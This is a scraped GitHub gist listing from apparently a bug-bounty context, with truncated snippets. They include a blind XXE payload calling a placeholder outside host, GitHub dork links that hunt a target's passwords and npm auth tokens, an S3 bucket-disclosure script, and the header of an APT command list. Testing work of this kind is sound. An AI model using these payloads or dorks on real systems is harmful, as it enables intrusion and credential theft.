This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| -------------------------------------------------------------- | |
| Vanilla, used to verify outbound xxe or blind xxe | |
| -------------------------------------------------------------- | |
| <?xml version="1.0" ?> | |
| <!DOCTYPE r [ | |
| <!ELEMENT r ANY > | |
| <!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
| ]> | |
| <r>&sp;</r> |
jhaddix
/ Github bash generated search links (from hunter.sh)
Created
January 12, 2020 19:55
Github bash generated search links (from hunter.sh)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| echo "" | |
| echo "************ Github Dork Links (must be logged in) *******************" | |
| echo "" | |
| echo " password" | |
| echo "https://github.com/search?q=%22$1%22+password&type=Code" | |
| echo "https://github.com/search?q=%22$without_suffix%22+password&type=Code" | |
| echo "" | |
| echo " npmrc _auth" |
kmcquade
/ AWS API calls that return credentials.md
Last active
May 2, 2024 14:39
AWS API calls that return credentials
fransr
/ bucket-disclose.sh
Last active
May 1, 2024 09:46
Using error messages to decloak an S3 bucket. Uses soap, unicode, post, multipart, streaming and index listing as ways of figure it out. You do need a valid aws-key (never the secret) to properly get the error messages
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # Written by Frans Rosén (twitter.com/fransrosen) | |
| _debug="$2" #turn on debug | |
| _timeout="20" | |
| #you need a valid key, since the errors happens after it validates that the key exist. we do not need the secret key, only access key | |
| _aws_key="AKIA..." | |
| H_ACCEPT="accept-language: en-US,en;q=0.9,sv;q=0.8,zh-TW;q=0.7,zh;q=0.6,fi;q=0.5,it;q=0.4,de;q=0.3" | |
| H_AGENT="user-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36" |
sohamkamani
/ rsa.go
Created
April 12, 2020 17:31
Example of RSA encryption, decryption, signing, and verification in Go
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| package main | |
| import ( | |
| "crypto" | |
| "crypto/rand" | |
| "crypto/rsa" | |
| "crypto/sha256" | |
| "encoding/base64" | |
| "fmt" | |
| ) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* Useful celery config. | |
| app = Celery('tasks', | |
| broker='redis://localhost:6379', | |
| backend='redis://localhost:6379') | |
| app.conf.update( | |
| CELERY_TASK_RESULT_EXPIRES=3600, | |
| CELERY_QUEUES=( | |
| Queue('default', routing_key='tasks.#'), |
eur0pa
/ waywords.go
Last active
April 11, 2024 08:32
— forked from lc/waywords.go
generate wordlists utilizing the wayback machine
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| package main | |
| import ( | |
| "bufio" | |
| "fmt" | |
| "net/url" | |
| "os" | |
| "strings" | |
| ) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # | |
| # GoLang cross-compile snippet for Go 1.6+ based loosely on Dave Chaney's cross-compile script: | |
| # http://dave.cheney.net/2012/09/08/an-introduction-to-cross-compilation-with-go | |
| # | |
| # To use: | |
| # | |
| # $ cd ~/path-to/my-awesome-project | |
| # $ go-build-all | |
| # |
MSAdministrator
/ iranian_apit_groups_possible_commands.md
Last active
April 10, 2024 14:30
Iranian APT Groups & Possible Commands Used By These Groups
The following content is generated using a preview release of Swimlane's pyattck.
This snippet of data is scoped to the following actor groups:
- APT33
- APT34
- APT39
- Charming Kitten
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # https://twitter.com/brsn76945860/status/1171233054951501824 | |
| pip install mmh3 | |
| ----------------------------- | |
| # python 2 | |
| import mmh3 | |
| import requests | |
| response = requests.get('https://cybersecurity.wtf/favicon.ico') | |
| favicon = response.content.encode('base64') |
NewerOlder